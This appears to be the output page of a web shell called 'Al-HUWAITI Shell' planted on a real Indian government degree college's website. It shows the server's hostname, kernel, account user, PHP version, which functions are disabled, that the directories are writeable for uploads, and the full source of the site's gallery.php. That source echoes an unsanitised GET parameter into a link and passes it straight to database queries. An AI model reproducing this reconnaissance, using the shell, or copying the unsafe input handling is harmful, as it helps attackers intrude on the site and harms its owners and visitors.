Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux server.xvl.jdw.mybluehostin.me 5.14.0-611.42.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 24 05:30:20 EDT 2026 x86_64
User : gdckalyandurg ( 1043)
PHP Version : 8.2.30
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/gdckalyandurg/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/gdckalyandurg/public_html/gallery.php
<?php
include("config.php");

$course = $_GET['course'];

$course_info = $db->selectRow('subjects', '*', $course);
$department_info = $db->selectRow('departments', '*', $course_info['department']);
$galleries = $db->select('department_galleries', '*', array('subject'=>$course), 'ORDER BY id DESC');

?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>SVGM Government Degree College, Kalyandurg</title>
<!-- Stylesheets -->
<link href="css/bootstrap.css" rel="stylesheet">
<link href="css/revolution-slider.css" rel="stylesheet">
<link href='https://fonts.googleapis.com/css?family=Libre+Baskerville:400,400italic,700' rel='stylesheet' type='text/css'>
<link href="css/style.css" rel="stylesheet">
<link href="css/extra.css" rel="stylesheet">
<link href="css/font-awesome.css" rel="stylesheet">
<link rel='stylesheet' id='google-font-css'  href='//fonts.googleapis.com/css?family=Roboto%3A400%2C300%2C500%2C400italic%2C700%2C500italic%2FScript%3Alatin-ext%7CBitter&#038;ver=4.8.8' type='text/css' media='all' />
<!--Favicon-->
<link rel="shortcut icon" href="images/gcm.png" type="image/x-icon">
<link rel="icon" href="images/gcm.png" type="image/x-icon">
<!-- Responsive -->
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
<link href="css/responsive.css" rel="stylesheet">
<!-- Start WOWSlider.com HEAD section -->
<link rel="stylesheet" type="text/css" href="engine1/style.css" />
<link rel="stylesheet" href="css/styles.css">
<script type="text/javascript" src="engine1/jquery.js"></script>
<!-- End WOWSlider.com HEAD section -->
<!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]-->
<!--[if lt IE 9]><script src="js/respond.js"></script><![endif]-->
<style type="text/css">
<!--
.style2 {
	color: #ff6600;
	font-weight: bold;
}
-->
</style>
</head>
<body>
<div class="page-wrapper">

  <?php include("includes/header.php"); ?>
  
  <div class="page-heading">
    <div class="container">
      <div class="row">
           <div class="col-md-6 col-sm-6">&nbsp;</div>
        <div class="col-md-6 col-sm-6">
          <h1><?php echo $course_info['subject']; ?></h1>
        </div>
       
      </div>
    </div>
  </div>
  
  
  <div class="auto-container">
    <div class="welcome-content">
      <div class="row">
        <div class="col-sm-3 col-xs-12">
          <?php include("includes/department-menu.php"); ?>
        </div>
        <div class="col-sm-9 col-xs-12 no-padding" >
          
		  <div class="text" align="justify" id="content">
		  
		  	<img src="admin/<?php echo $course_info['banner']; ?>" /><br><br>
            <table style="width:100%" cellspacing="0" cellpadding="0" border="1">
              <tbody>
                <tr>
                  <td style="width:56px; background:#eee;"><p style="text-align: center;"> <span style="color:#ff8c00; font-size:16px;"><strong>S.No</strong></span></span></p></td>
                  <td style="width:402px; background:#eee;"><p style="text-align: center;"> <span style="color:#ff8c00; font-size:16px;"><strong>Events/Activities</strong></span></span></p></td>
                  <td style="width:210px; background:#eee;"><p style="text-align: center;"> <span style="color:#ff8c00; font-size:16px;"><strong>View</strong></span></span></p></td>
                </tr>
				<?php $i = 1; foreach($galleries as $gallery){ ?>
                <tr>
                  <td><p align="center"> <span style="font-size:16px;"><?php echo $i; ?></span></p></td>
                  <td align="center"><p> <span style="font-size:16px;"><?php echo $gallery->title; ?></span></p></td>
                  <td><p align="center"> <span style="font-size:16px;"><a href="gallery-details.php?course=<?php echo $course; ?>&gallery=<?php echo $gallery->id; ?>">View</a></span></p></td>
                </tr>
				<?php $i++; } ?>
              </tbody>
            </table>
		  </div>
		  
       </div>
      </div>
    </div>
  </div>
  <div class="row clearfix"> </div>
</div>

<?php include("includes/footer.php"); ?>
</body>
</html>

Al-HUWAITI Shell